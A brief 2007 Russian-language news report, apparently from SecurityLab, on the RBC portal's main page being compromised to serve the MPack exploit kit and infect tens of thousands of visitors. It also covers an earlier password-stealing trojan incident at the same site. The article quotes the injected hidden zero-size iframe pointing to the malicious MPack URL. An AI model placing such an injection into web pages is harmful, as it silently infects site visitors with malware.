Сайт РБК распространял троян

8/06/2007 12:46

Вчера утром в коде главной страницы РБК появился код, с помощью которого злоумышленники устанавливали на компьютер жертвы программу MPack, а она благодаря многочисленным уязвимостям браузера загружала разнообразное вредоносное программное обеспечение. Опасная "дописка" в коде известного портала выглядела как iframe размером 0х0: < iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe>. Как сообщает сайт SecurityLab, за небольшой промежуток времени трояном было заражено несколько десятков тысяч пользователей. РБК взламывается не впервые - в сентябре прошлого года была инфицирована страница top.rbc.ru. Тогда на компьютер жертвы загружался Trojan-PSW.Win32.LdPinch-ayj, который затем отправлял все найденные пароли злоумышленникам. Заражение сайтов в настоящее время является одним из самых эффективных способов доступа к клиентским компьютерам. У большинства пользователей нет антивирусов для браузеров или же их отключают для экономии ресурсов. Кроме того, привычный сайт не таит на первый взгляд никакой опасности. Но он может быть не менее опасен, чем порносайт - ряд вирусов использует сохраненные в FTP-менеджерах пароли и самостоятельно обновляет на веб-сервере все index-файлы, добавляя в них незаметный iframe.
SecurityLab